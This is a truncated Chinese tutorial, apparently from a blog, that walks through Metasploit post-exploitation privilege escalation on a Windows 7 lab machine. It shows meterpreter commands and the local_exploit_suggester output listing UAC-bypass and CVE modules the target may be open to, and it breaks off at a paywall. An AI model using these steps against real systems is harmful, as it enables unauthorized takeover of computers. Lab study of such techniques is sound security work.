本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。
环境准备:
| 名称 | 系统 | 位数 | IP |
| 攻击机 | Kali Linux | 64 | 10.3.0.231 |
| 客户端 | Windows 7 | 64 | 10.3.0.234 |
当我们通过MSF成功登录靶机时,进行提权时如果报如下,表示没有拿到系统权限
meterpreter > getsystem
# 输出
[-] priv_elevate_getsystem: Operation failed: 1726 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)接下我们演示如何进入提权:
1、切换 msf
meterpreter > bg
# 输出
[*] Backgrounding session 2...2、使用本地漏洞模块
# 用这个模块快速识别系统中可能被利用的漏洞
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
# 输出
msf6 post(multi/recon/local_exploit_suggester) > 3、设置 Session
# session 值通过 sessions -l 查看
msf6 post(multi/recon/local_exploit_suggester) > set session 2
# 输出
session => 24、运行
msf6 post(multi/recon/local_exploit_suggester) > run
# 输出
[*] 10.3.0.234 - Collecting local exploits for x64/windows...
[*] 10.3.0.234 - 186 exploit checks are being tried...
[+] 10.3.0.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.3.0.234 - exploit/windows/local/
最低0.47元/天 解锁文章
扫一扫
256
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
